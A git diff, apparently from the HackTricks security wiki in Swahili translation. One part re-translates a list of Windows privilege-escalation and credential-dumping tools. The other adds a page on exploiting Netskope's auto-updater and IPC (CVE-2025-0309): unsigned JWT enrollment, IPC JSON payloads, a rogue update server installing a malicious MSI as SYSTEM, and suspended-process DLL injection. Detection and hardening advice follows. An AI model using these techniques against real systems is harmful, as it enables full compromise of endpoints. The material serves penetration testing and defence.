here**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**). Imegunduliwa.**\ -[**JAWS**](https://github.com/411Hall/JAWS) **-- Kagua baadhi ya misconfigurations zinazowezekana na kukusanya taarifa (**[**check here**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**).**\ -[**privesc** ](https://github.com/enjoiz/Privesc)**-- Kagua misconfigurations**\ -[**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) **-- Inatoa taarifa za PuTTY, WinSCP, SuperPuTTY, FileZilla, na RDP saved sessions. Tumia -Thorough lokali.**\ -[**Invoke-WCMDump**](https://github.com/peewpw/Invoke-WCMDump) **-- Inachota credentials kutoka Credential Manager. Imegunduliwa.**\ -[**DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray) **-- Piga passwords zilizokusanywa katika domain**\ -[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **-- Inveigh ni PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer na man-in-the-middle tool.**\ -[**WindowsEnum**](https://github.com/absolomb/WindowsEnum/blob/master/WindowsEnum.ps1) **-- Uorodheshaji wa msingi wa privesc Windows**\ -[~~**Sherlock**~~](https://github.com/rasta-mouse/Sherlock) **\~\~**\~\~ -- Tafuta privesc vulnerabilities zinazoeleweka (DEPRECATED kwa Watson)\ -[~~**WINspect**~~](https://github.com/A-mIn3/WINspect) -- Michoro ya ndani **(Inahitaji haki za Admin)** +[**PowerSploit-Privesc(PowerUP)**](https://github.com/PowerShellMafia/PowerSploit) **-- Check for misconfigurations and sensitive files (**[**check here**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**). Detected.**\ +[**JAWS**](https://github.com/411Hall/JAWS) **-- Check for some possible misconfigurations and gather info (**[**check here**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**).**\ +[**privesc** ](https://github.com/enjoiz/Privesc)**-- Check for misconfigurations**\ +[**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) **-- It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information. Use -Thorough in local.**\ +[**Invoke-WCMDump**](https://github.com/peewpw/Invoke-WCMDump) **-- Extracts crendentials from Credential Manager. Detected.**\ +[**DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray) **-- Spray gathered passwords across domain**\ +[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **-- Inveigh is a PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool.**\ +[**WindowsEnum**](https://github.com/absolomb/WindowsEnum/blob/master/WindowsEnum.ps1) **-- Basic privesc Windows enumeration**\ +[~~**Sherlock**~~](https://github.com/rasta-mouse/Sherlock) **\~\~**\~\~ -- Search for known privesc vulnerabilities (DEPRECATED for Watson)\ +[~~**WINspect**~~](https://github.com/A-mIn3/WINspect) -- Local checks **(Need Admin rights)** **Exe** -[**Watson**](https://github.com/rasta-mouse/Watson) -- Tafuta privesc vulnerabilities zinazojulikana (inahitaji ku-compile kwa kutumia VisualStudio) ([**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\ -[**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- Inafanya enumeration ya host kutafuta misconfigurations (zaidi ni tool ya kukusanya taarifa kuliko privesc) (inahitaji ku-compile) **(**[**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\ -[**LaZagne**](https://github.com/AlessandroZ/LaZagne) **-- Inachota credentials kutoka kwa programu nyingi (exe iliyotengenezwa awali kwenye github)**\ -[**SharpUP**](https://github.com/GhostPack/SharpUp) **-- Port ya PowerUp kwa C#**\ -[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) **\~\~**\~\~ -- Kagua misconfiguration (executable imeprecompiled kwenye github). Haipendekezwi. Haifanyi kazi vizuri kwenye Win10.\ -[~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- Kagua misconfigurations zinazowezekana (exe kutoka python). Haipendekezwi. Haifanyi kazi vizuri kwenye Win10. +[**Watson**](https://github.com/rasta-mouse/Watson) -- Search for known privesc vulnerabilities (needs to be compiled using VisualStudio) ([**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\ +[**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- Enumerates the host searching for misconfigurations (more a gather info tool than privesc) (needs to be compiled) **(**[**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\ +[**LaZagne**](https://github.com/AlessandroZ/LaZagne) **-- Extracts credentials from lots of softwares (precompiled exe in github)**\ +[**SharpUP**](https://github.com/GhostPack/SharpUp) **-- Port of PowerUp to C#**\ +[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) **\~\~**\~\~ -- Check for misconfiguration (executable precompiled in github). Not recommended. It does not work well in Win10.\ +[~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- Check for possible misconfigurations (exe from python). Not recommended. It does not work well in Win10. **Bat** -[**winPEASbat** ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)-- Tool iliyotengenezwa msingi wa post hii (haihitaji accesschk kufanya kazi vizuri lakini inaweza kuitumia). +[**winPEASbat** ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)-- Tool created based in this post (it does not need accesschk to work properly but it can use it). **Local** -[**Windows-Exploit-Suggester**](https://github.com/GDSSecurity/Windows-Exploit-Suggester) -- Inasoma output ya **systeminfo** na kupendekeza exploits zinazofanya kazi (python za ndani)\ -[**Windows Exploit Suggester Next Generation**](https://github.com/bitsadmin/wesng) -- Inasoma output ya **systeminfo** na kupendekeza exploits zinazofanya kazi (python za ndani) +[**Windows-Exploit-Suggester**](https://github.com/GDSSecurity/Windows-Exploit-Suggester) -- Reads the output of **systeminfo** and recommends working exploits (local python)\ +[**Windows Exploit Suggester Next Generation**](https://github.com/bitsadmin/wesng) -- Reads the output of **systeminfo** andrecommends working exploits (local python) **Meterpreter** _multi/recon/local_exploit_suggestor_ -You have to compile the project using the correct version of .NET ([see this](https://rastamouse.me/2018/09/a-lesson-in-.net-framework-versions/)). To see the installed version of .NET on the victim host you can do: +Unapaswa kucompile project kwa kutumia toleo sahihi la .NET ([see this](https://rastamouse.me/2018/09/a-lesson-in-.net-framework-versions/)). Ili kuona toleo la .NET lililosakinishwa kwenye host ya mwathiri unaweza kufanya: ``` C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line ``` -## Marejeleo +## Marejeo - [http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html) - [http://www.greyhathacker.net/?p=738](http://www.greyhathacker.net/?p=738) diff --git a/src/windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md b/src/windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md new file mode 100644 index 000000000..0c558fbdc --- /dev/null +++ b/src/windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md @@ -0,0 +1,123 @@ +# Kutumiwa Vibaya kwa Auto-Updaters za Shirika na IPC zilizo na Vibali (e.g., Netskope stAgentSvc) + +{{#include ../../banners/hacktricks-training.md}} + +Ukurasa huu unazungumzia darasa la Windows local privilege escalation chains zinazopatikana katika endpoint agents na updaters za shirika ambazo zinaonyesha uso wa IPC wa low‑friction na mtiririko wa update wenye vibali. Mfano unaowakilisha ni Netskope Client for Windows < R129 (CVE-2025-0309), ambapo mtumiaji mwenye vibali vya chini anaweza kulazimishwa kujiunga na server inayodhibitiwa na mshambuliaji kisha kuwasilisha MSI ya uharibifu ambayo service ya SYSTEM inaisakinisha. + +Mawazo muhimu unayoweza kutumia dhidi ya bidhaa zinazofanana: +- Abuse a privileged service’s localhost IPC to force re‑enrollment or reconfiguration to an attacker server. +- Implement the vendor’s update endpoints, deliver a rogue Trusted Root CA, and point the updater to a malicious, “signed” package. +- Evade weak signer checks (CN allow‑lists), optional digest flags, and lax MSI properties. +- If IPC is “encrypted”, derive the key/IV from world‑readable machine identifiers stored in the registry. +- If the service restricts callers by image path/process name, inject into an allow‑listed process or spawn one suspended and bootstrap your DLL via a minimal thread‑context patch. + +--- +## 1) Forcing enrollment to an attacker server via localhost IPC + +Wakala wengi hutoa mchakato wa user‑mode UI ambao unazungumza na service ya SYSTEM juu ya localhost TCP kwa kutumia JSON. + +Imeonekana katika Netskope: +- UI: stAgentUI (low integrity) ↔ Service: stAgentSvc (SYSTEM) +- IPC command ID 148: IDP_USER_PROVISIONING_WITH_TOKEN + +Exploit flow: +1) Craft a JWT enrollment token whose claims control the backend host (e.g., AddonUrl). Use alg=None so no signature is required. +2) Send the IPC message invoking the provisioning command with your JWT and tenant name: +```json +{ +"148": { +"idpTokenValue": "", +"tenantName": "TestOrg" +} +} +``` +3) Service inaanza kuwasiliana na rogue server yako kwa ajili ya enrollment/config, kwa mfano: +- /v1/externalhost?service=enrollment +- /config/user/getbrandingbyemail + +Vidokezo: +- Ikiwa uthibitishaji wa mtumaji unategemea njia/jina, tuma ombi kutoka kwa vendor binary iliyoorodheshwa kwenye orodha ya kuruhusiwa (angalia §4). + +--- +## 2) Hijacking the update channel to run code as SYSTEM + +Mara client inapozungumza na server yako, tekeleza endpoints zinazotarajiwa na ielekeze kwa attacker MSI. Mfuatano wa kawaida: + +1) /v2/config/org/clientconfig → Rudisha JSON config yenye kipindi kifupi sana cha updater, kwa mfano: +```json +{ +"clientUpdate": { "updateIntervalInMin": 1 }, +"check_msi_digest": false +} +``` +2) /config/ca/cert → Rudisha cheti cha CA katika fomati PEM. Huduma inakisakinisha katika Local Machine Trusted Root store. +3) /v2/checkupdate → Weka metadata inayorejelea MSI haribifu na toleo bandia. + +Bypassing common checks seen in the wild: +- Signer CN allow‑list: huduma inaweza tu kuangalia Subject CN ni “netSkope Inc” au “Netskope, Inc.”. CA yako ya uhalifu inaweza kutoa leaf yenye CN hiyo na kusaini MSI. +- CERT_DIGEST property: jumuisha mali ya MSI isiyoharibu yenye jina CERT_DIGEST. Hakuna utekelezaji wa lazima wakati wa usakinishaji. +- Optional digest enforcement: config flag (e.g., check_msi_digest=false) inazima uthibitishaji wa ziada wa kriptografia. + +Matokeo: service ya SYSTEM inakisakinisha MSI yako kutoka +C:\ProgramData\Netskope\stAgent\data\*.msi +ikitekeleza nambari yoyote kama NT AUTHORITY\SYSTEM. + +--- +## 3) Forging encrypted IPC requests (when present) + +Kutoka R127, Netskope ilifunika IPC JSON katika uwanja encryptData unaoonekana kama Base64. Reversing ilionyesha AES yenye key/IV zinazotokana na thamani za registry zinazoweza kusomwa na mtumiaji yeyote: +- Key = HKLM\SOFTWARE\NetSkope\Provisioning\nsdeviceidnew +- IV = HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductID + +Wavamizi wanaweza kuiga encryption na kutuma amri za IPC zenye encryption halali kutoka kwa mtumiaji wa kawaida. Ushauri wa jumla: ikiwa agent kwa ghafla “inaficha” IPC yake, tazama device IDs, product GUIDs, install IDs chini ya HKLM kama nyenzo za encryption. + +--- +## 4) Bypassing IPC caller allow‑lists (path/name checks) + +Huduma zingine hujaribu kuthibitisha peer kwa kutatua PID ya muunganisho wa TCP na kulinganisha image path/name dhidi ya binaries zilizoorodheshwa za vendor chini ya Program Files (mfano stagentui.exe, bwansvc.exe, epdlp.exe). + +Njia mbili za vitendo: +- DLL injection ndani ya process iliyo kwenye allow‑list (mfano nsdiag.exe) na kushika/proxy IPC kutoka ndani yake. +- Piga kengele binary iliyoorodheshwa ikifufuliwa kwa hali ya suspended na kuanzisha DLL yako ya proxy bila CreateRemoteThread (see §5) ili kutosheleza sheria zilizotekelezwa na driver kuzuia tampering. + +--- +## 5) Tamper‑protection friendly injection: suspended process + NtContinue patch + +Products mara nyingi huja na minifilter/OB callbacks driver (mfano Stadrv) inayokata haki hatari kutoka kwa handles za processes zilizo na ulinzi: +- Process: inatoa mazingira kama PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_READ, PROCESS_DUP_HANDLE, PROCESS_SUSPEND_RESUME +- Thread: inazuia hadi THREAD_GET_CONTEXT, THREAD_QUERY_LIMITED_INFORMATION, THREAD_RESUME, SYNCHRONIZE + +Loader ya user‑mode inayotegemewa na kuheshimu vikwazo hivi: +1) CreateProcess ya vendor binary na CREATE_SUSPENDED. +2) Pata handles ambazo bado unaruhusiwa: PROCESS_VM_WRITE | PROCESS_VM_OPERATION kwa process, na thread handle yenye THREAD_GET_CONTEXT/THREAD_SET_CONTEXT (au tu THREAD_RESUME ikiwa unatayarisha code kwenye RIP inayojulikana). +3) Andika juu ya ntdll!NtContinue (au thunk nyingine ya mapema, iliyoorodheshwa kwa hakika) kwa stub ndogo inayopiga LoadLibraryW kwenye path ya DLL yako, kisha kuruka kurudi. +4) ResumeThread ili kuamsha stub yako ndani ya process, ikipakia DLL yako. + +Kwa sababu haukutumia PROCESS_CREATE_THREAD au PROCESS_SUSPEND_RESUME kwenye process iliyokuwa tayari na ulinzi (uliiunda wewe), sera ya driver inatimizwa. + +--- +## 6) Practical tooling +- NachoVPN (Netskope plugin) inaendesha otomatiki rogue CA, kusaini MSI haribifu, na kutumika kupeana endpoints zinazohitajika: /v2/config/org/clientconfig, /config/ca/cert, /v2/checkupdate. +- UpSkope ni custom IPC client inayotengeneza ujumbe wowote wa IPC (hiari kwa AES‑encryption) na inajumuisha suspended‑process injection ili asili iwe kutoka kwa binary iliyoorodheshwa. + +--- +## 7) Detection opportunities (blue team) +- Simamia uongezaji wa Local Machine Trusted Root. Sysmon + registry‑mod eventing (see SpecterOps guidance) hufanya kazi vizuri. +- Tambua utekelezaji wa MSI ulioanzishwa na service ya agent kutoka paths kama C:\ProgramData\\\data\*.msi. +- Angalia logs za agent kwa hosts/tenants zisizotarajiwa za enrollment, kwa mfano: C:\ProgramData\netskope\stagent\logs\nsdebuglog.log – tafuta addonUrl / tenant anomalies na provisioning msg 148. +- Toa alarm juu ya localhost IPC clients ambao si binaries zilizotarajiwa kusainiwa, au wanaotokana na miti ya child process isiyo ya kawaida. + +--- +## Hardening tips for vendors +- Gana enrollment/update hosts kwa allow‑list kali; kataa domains zisizo salama katika clientcode. +- Thibitisha IPC peers kwa primitives za OS (ALPC security, named‑pipe SIDs) badala ya ukaguzi wa image path/name. +- Weka nyenzo za siri nje ya HKLM zinazosomeka kwa wote; ikiwa IPC lazima iwe encrypted, zaa keys kutoka kwa siri zilizo na ulinzi au zigadilishe juu ya channels zilizo thibitishwa. +- Tendea updater kama uso wa supply‑chain: hitaji mnyororo kamili hadi CA uamiliki, thibitisha signatures za package dhidi ya pinned keys, na fail closed ikiwa validation imezimwa katika config. + +## References +- [Advisory – Netskope Client for Windows – Local Privilege Escalation via Rogue Server (CVE-2025-0309)](https://blog.amberwolf.com/blog/2025/august/advisory---netskope-client-for-windows---local-privilege-escalation-via-rogue-server/) +- [NachoVPN – Netskope plugin](https://github.com/AmberWolfCyber/NachoVPN) +- [UpSkope – Netskope IPC client/exploit](https://github.com/AmberWolfCyber/UpSkope) +- [NVD – CVE-2025-0309](https://nvd.nist.gov/vuln/detail/CVE-2025-0309) + +{{#include ../../banners/hacktricks-training.md}}